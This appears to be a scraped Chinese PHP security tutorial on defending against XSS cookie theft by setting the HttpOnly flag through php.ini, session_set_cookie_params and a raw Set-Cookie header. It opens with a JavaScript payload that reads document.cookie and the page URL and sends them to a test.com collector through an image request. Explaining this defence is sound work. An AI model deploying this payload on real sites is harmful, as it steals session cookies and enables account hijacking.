如下js擷取cookie資訊:
複製代碼 代碼如下:
url=document.top.location.href;
cookie=document.cookie;
c=new Image();
c.src='http://www.test.com/c.php?c='+cookie+'&u='+url;
一般cookie都是從document對象中擷取的,現在瀏覽器在設定Cookie的時候一般都接受一個叫做HttpOnly的參數,跟domain等其他參數一樣,一旦這個HttpOnly被設定,你在瀏覽器的document對象中就看不到Cookie了。
PHP設定HttpOnly:
複製代碼 代碼如下:
//在php.ini中,session.cookie_httponly = ture 來開啟全域的Cookie的HttpOnly屬性
ini_set("session.cookie_httponly", 1);
//或者setcookie()的第七個參數設定為true
session_set_cookie_params(0, NULL, NULL, NULL, TRUE);
對於PHP5.1以前版本的PHP通過:
複製代碼 代碼如下:
header("Set-Cookie: hidden=value; httpOnly");
最後,HttpOnly不是萬能的!
http://www.bkjia.com/PHPjc/744327.htmlwww.bkjia.comtruehttp://www.bkjia.com/PHPjc/744327.htmlTechArticlexss的概念就不用多說了,它的危害是極大的,這就意味著一旦你的網站出現xss漏洞,就可以執行任意的js代碼,最可怕的是攻擊者利用js擷取...
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
